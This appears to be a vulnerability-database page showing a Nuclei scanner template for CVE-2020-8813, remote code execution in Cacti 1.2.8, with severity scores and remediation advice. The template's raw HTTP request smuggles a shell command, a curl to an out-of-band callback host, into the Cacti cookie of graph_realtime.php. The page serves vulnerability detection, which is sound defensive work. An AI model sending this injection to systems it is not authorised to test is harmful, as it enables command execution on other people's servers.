Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-8813
HistoryJul 26, 2021 - 2:32 a.m.

Cacti v1.2.8 - Remote Code Execution

2021-07-2602:32:23
ProjectDiscovery
github.com
4

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.941 High

EPSS

Percentile

99.1%

Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if “Guest Realtime Graphs” privileges are enabled.

id: CVE-2020-8813

info:
  name: Cacti v1.2.8 - Remote Code Execution
  author: gy741
  severity: high
  description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability.
  reference:
    - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
    - https://github.com/Cacti/cacti/releases
    - https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
    - https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8813
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-8813
    cwe-id: CWE-78
    epss-score: 0.95033
    epss-percentile: 0.9913
    cpe: cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cacti
    product: cacti
  tags: cve2020,cve,cacti,rce,oast

http:
  - raw:
      - |
        GET /graph_realtime.php?action=init HTTP/1.1
        Host: {{Hostname}}
        Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a0047304502204ec01dfe89f1f9796f53b43c3f8f9bfff0db4ea3e3eb7da3df8e6f4a15c93004022100a3827d38bc0be92d24eef29752497f720909d1d144850428accdd33dc2a798e8:922c64590222798bb761d5b6d8e72950

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.9 High

AI Score

Confidence

High

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.941 High

EPSS

Percentile

99.1%